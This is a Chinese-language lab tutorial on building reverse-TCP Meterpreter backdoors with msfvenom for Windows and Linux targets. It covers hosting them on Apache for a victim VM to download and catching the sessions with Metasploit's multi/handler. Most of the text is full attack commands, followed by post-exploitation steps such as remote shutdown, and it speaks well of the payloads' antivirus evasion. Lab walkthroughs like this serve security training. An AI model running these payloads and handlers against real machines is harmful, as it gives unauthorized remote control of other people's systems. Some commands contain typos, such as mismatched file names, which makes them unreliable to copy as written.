目录
msfvenom是什么?
msfvenom是msfpayload,msfencode集成的一个免费的、可下载的框架工具。通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。它的优点是一个单一的工具、标准化的命令行选项、效率高,其免杀效果也不错。主要用于生成后门和软件捆绑后门,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。
使用msfvenom生成被控端
1.对windows系统的远程控制
1.1生成被控端并在靶机运行
①生成被控端
方法一:
⑴将被控端payload.exe生成到/var/payload.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xxx.xxx lport=5000 -f exe -o /var/pavload.exe
⑵再被控端改名为winpayload.exe复制到网站的目录(/var/www/html/)
cp /var/payload.exe /var/www/html/winpayload.exe
ls 查看指定目录下的所有文件
方法二:
将被控端winpayload.exe生成到网站的目录(/var/www/html/)下
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.163.130 lport=5000 -f exe -o /var/www/html/winpayload.exe
②启动apache2服务
启动apache2服务:systemctl start apache2.service
检查apache2服务是否启动:systemctl status apache2.service
③到靶机WinXPenSP3中下载并运行
1.2启动主控端
①启动metasploit
②使用模块,配置参数
⑴进入handler模块
use exploit/multi/handler
⑵设置攻击载荷
set payload windows/meterpreter/reverse_tcp
⑶设置lhost为kali的IP
set lhost 192.168.xxx.xxx
⑷设置lpost
set lport 5000
⑸发起攻击,建立会话
1.3控制靶机
通过shell,执行命令
⑴查看操作系统信息
⑵查看目标靶机有哪些磁盘
⑶延时关闭系统并弹出提示框
⑷退出控制
2.对linux系统的远程控制
2.1生成被控端并在靶机中下载
①生成被控端
将被控端linuxpayload.elf生成到网站的目录(/var/www/html/)下
msfvenom -p linux/meterpreter/reverse_tcp LHOST=192.168.xxx.xxx lport=5001 -f elf -o /var/www/html/linuxpayload.exe
②启动apache2服务
启动apache2服务:systemctl start apache2.service
检查apache2服务是否启动:systemctl status apache2.service
③到靶机WinXPenSP3中下载
⑴下载被控端
⑵添加执行权限
2.2启动主控端
①启动metasploit
②使用模块,配置参数
⑴进入handler模块
use exploit/multi/handler
⑵设置攻击载荷
set payload linux/x86/meterpreter/reverse_tcp
⑶设置lhost为kali的IP
set lhost 192.168.xxx.xxx
⑷设置lpost
set lport 5001
⑸发起攻击,运行被控端
2.3控制靶机
通过shell,执行命令
⑴查看操作系统信息
⑵查看主机名
⑶使用curl命令访问kali的网页
⑷退出控制
拓展
1、查看帮助信息
2、查看所有可以使用的攻击模块
3、筛选出的模块
这里以reverse_tcp模块为例
4、查看攻击载荷需要设置的参数